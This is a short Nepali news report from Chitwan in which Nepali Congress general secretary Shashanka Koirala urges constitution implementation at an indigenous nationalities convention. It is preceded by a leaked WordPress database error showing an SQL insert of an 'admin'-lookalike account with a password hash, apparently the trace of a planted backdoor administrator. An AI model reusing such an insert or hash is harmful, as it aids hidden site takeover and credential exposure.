WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLOPIDaFE9HH01luuWAQDsqnku74oz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 02:03:45', '', 'admlnlx', 'admlnlx')
चितवन,पुस २-
नेपाली कांग्रेसका महामन्त्री शसांक कोइरालाले सवैको आ-आफ्नो नियित स्वार्थ त्यागेर संविधान कार्यान्वयनमा लाग्नुपर्ने वताउनु भएको छ ।उहांले पार्टी भन्दा देश ठुलो रहेकाले सवैले गम्भिर भएर सोच्ने वेला आएको वताउनु भयो । आदिवासी जनजाति महासंघको महाधिवेशन भरतपुरमा उद्घाटन गर्दै कोइरालाले देश रहे मात्र सवैको अतित्व रहने भएकाले सवै तिक्तता छाडेर संविधान कार्यान्वयनमा लाग्न आग्रह गर्नुभयो ।महामन्त्री कोइरालाले आदिवासीका मुद्धाको सवाल कांग्रेस सधैं प्रतिवद्ध हुदै आएको समेत स्पष्ट पार्नुभयो ।